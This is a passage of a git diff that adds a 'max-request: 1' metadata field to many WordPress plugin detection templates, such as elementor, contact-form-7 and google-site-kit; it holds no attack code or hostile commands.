https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..b9de0ee313 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 